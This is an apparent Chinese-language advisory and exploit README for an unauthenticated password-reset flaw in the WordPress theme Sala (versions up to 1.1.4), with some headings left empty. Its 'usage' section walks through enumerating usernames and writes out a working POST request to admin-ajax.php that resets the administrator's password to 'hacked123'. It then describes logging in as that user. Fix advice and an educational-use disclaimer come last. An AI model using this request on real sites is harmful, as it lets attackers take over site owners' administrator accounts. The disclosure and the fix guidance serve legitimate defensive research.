🔥 漏洞概述
WordPress 主题 Sala 版本 <= 1.1.4 存在一个未认证权限提升漏洞。该缺陷允许未认证攻击者通过直接调用暴露的 AJAX 端点(无需验证请求者身份)来重置任意用户(包括管理员)的密码。
该漏洞源于注册在 wp_ajax_nopriv_ 下的 change_password_ajax 函数,该函数会为任何有效的用户登录名设置新密码,而不检查请求是否经过授权。
🔍 受影响的主题
🧪 漏洞利用特点
/wp-admin/admin-ajax.php?action=change_password_ajax🧠 研究人员
🚀 使用方法
识别目标 WordPress 站点上的有效用户名。可以通过以下方式实现:
/author/username)构造以下 POST 请求以重置用户密码:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: targetsite.com
Content-Type: application/x-www-form-urlencoded
action=change_password_ajax&login=admin&new_password=hacked123
如果成功,你现在可以使用新密码(上例中的 hacked123)以目标用户身份登录。
访问 /wp-login.php 并验证访问权限。
🛠 修复建议
wp_ajax_nopriv_change_password_ajax 钩子。is_user_logged_in() 并验证用户身份。🔒 免责声明:
本信息仅供教育和授权渗透测试使用。未经授权利用系统是非法且不道德的行为。
📚 参考: